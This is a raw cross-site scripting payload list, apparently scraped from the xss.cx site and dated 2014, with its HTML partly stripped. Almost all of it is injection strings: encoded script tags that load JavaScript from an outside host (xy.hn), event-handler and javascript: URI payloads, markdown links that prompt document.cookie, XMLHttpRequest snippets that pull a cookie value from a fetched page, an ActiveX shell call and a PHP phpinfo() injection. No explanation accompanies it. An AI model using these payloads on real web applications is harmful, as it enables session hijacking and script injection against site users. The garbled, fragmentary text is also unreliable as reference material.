/* Remote File Include with HTML TAGS via XSS.Cx */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */ /* Updated September 29, 2014 */ /* RFI START */ "] X` XSS cited! click click aa <%%%> <%1B(Jd%1B(Ji%1B(Jv>%1B(J "; ||confirm('XSS') || " echo(' /> *num* //|\\ < < > > %2522%253E%253Csvg%2520onload%3D%2522confirm(7)%2522%253E %253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E %253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E %253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E "%25prompt(9)%25" "%26%26prompt(9)%26%26" %26lt%3bscript> "%26prompt(9)%26" %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E <3 3 ">%00 "> "> < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > Click Me ClickMe ClickMe CLICK name a link CLICK click Clickhere Xclick hello click "/>X">XClick Me click test "/>test aa X X test Right click open in new tab "/>Click Here ">Click Here Click-XSS "> x X clickme a href="j&#x41;vascript:confirm%252831337%2529">Hello click CLICK click clickme in Opera/FF ;test?test;#test; ;test?test;&x=">#">test; XYZXXX ClickMe confirm((1)" onerror=>hello click xss ZDresearch ... "" "\">", > CLICKME "'>" '> charset=utf- '`"><*chr*script>log(*num*) Save // <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')">*datahtmlelements*> <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')">*datahtmlelements*> <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')">*datahtmlelements*> x?f right-click DIV DIV x <%div%20style=xss:expression(prompt(1))> style="x:"> style="x:"> Mouse Over X exp/*'/ for(i=10;i>1;i--)confirm(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); CLICK CLICK confirm(1) X //// CLICKME > > http://www.googlesetTimeout('confirm(1)',1) http://www. ? '%2Blocation.hash.substr(1)%2B'')%22>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22> r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22> r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22> r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22> `> "> "> "> "> /*iframe/src*/ "> "] /# # "> Yes, we are still inside a tag!"> "\">", > "> "> ">] "> ">#"> ">#"> "> "" "\">", > "" "/> "\"/>" "/> "\"/>" "> "" "\">", > >"'> "" "><--` --!> <--` --!> "\">", > =’”> '>< innerHTML=document.title innerHTML=innerText <> X X ">al%u0117rt('1') "/> "> XSS confirm(document.domain)"> <img src=x onerror=confirm(1)> < < <a href="http://i.imgur.com/b7sajuK.jpg" download>What a cute kitty!</a> <img src=xx:x onerror=confirm(1)> <label class="<% confirm(1) %>"> </script><script>confirm(1)</script> ^__^ ">confirm( `bypass :)`) "" "\">", > click click X ¼script ¾confirm(1)//¼/script ¾ "> ? ?movieName=";]);}catch(e){}if(!self.a)self.a=!confirm(document.domain);// ? "\"\/>" >" "> ? "/> "/> "" ">", "/> /*-->]]>%>?>'-/"///>' "'>" '> "\"\/>'>", >'> 123 ?param1= $.parseHTML('') |\>// >"><script>confirm('hi')</script>"<value="">"<"/> .replace(/.+/,eval)// "'">confirm(0); confirm(1)'>Clickme confirm(0); confirm(1); "confirm(0);" "\">confirm(0);", confirm(0); >confirm(0); # /*%00*/confirm(1)/*%00*/confirm(0%0) /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/ document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); /* "/> "" "\">", > "/># "/> confirm(1) confirm(/@jackmasa/) and %c0″//(%000000%0dconfirm(1)// ""/> "/> "" "><"script">"confirm(0)""script"> "\">", > "'>", confirm(1) >"<>" [ ∀㸀㰀script㸀confirm(1)㰀/script㸀 <% <% "/> "\"/>" >"<>" "" "\">", > >">& "'`> "`'> "/> #var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); #var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); "`'> "`'> "'`> \"> ? "/>/* try{eval("<>>");logBoolean(1)}catch(e){logBoolean(0)}; ~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')confirm(/@jackmasa/) # `'"> ' ">pt>confirm(document.cookie);pt> confirm(1); setTimeout(['confirm(4)']); stop, open, print && confirm(1) body{font-size: 0;} h1{font-size: 12px !important;}THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead..."; phpinfo(); __halt_compiler(); ?> aaa //style///>SPAN -->*{x:expression(confirm(4))}// "> y="> "" "\"/>" "" "" "\">", > "/> foo=">"> data:text/html,/**/confirm(1) '">> right-click ">bold %uff1cscript%uff1econfirm%uff0876310%uff09%uff1c/script%uff1e eval("\x61\x6c\x65\x72\x74\x28\x31\x29”) aa // XSS XSS XSS XSS ) <%00/title> <""/title> click "> "> "> "onresize=prompt(1)> --!> "> <%= puts "test" %> '"--> click xss= <% a=%><iframe/onload=alert(1)//> <%/z=%><p/onresize=alert(1)//> <%/z=%><p/onresize=alert(1)//> </xml><iframe/onload=alert(1)> </xmp><iframe/onload=alert(1)> </comment><iframe/onload=alert(1)> alert(location))"> </title><iframe/onload=alert(1)> Bring-Mouse-Over-Me d alert(1);/*&b=*/ alert(1)--> alert(1)//%> \x3Cscript\x3Ealert(document.domain);\x3C\x2Fscript\x3E data:text/html xss XSS alert%26lpar;1)%26lt;/script>"> test [a](javascript:prompt(document.cookie)) [a](j a v a s c r i p t:prompt(document.cookie)) )\ <javascript:alert('XSS')> \ [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) [a](javascript:alert('XSS')) \ [citelol]: (javascript:prompt(document.cookie)) [notmalicious](javascript:window.onerror=alert;throw%20document.cookie) [test](javascript://%0d%0aprompt(1)) [test](javascript://%0d%0aprompt(1);com) ">
123
?param1= $.parseHTML('') |\>// >"><script>confirm('hi')</script>"<
// >"><script>confirm('hi')</script>"<
>"><script>confirm('hi')</script>"<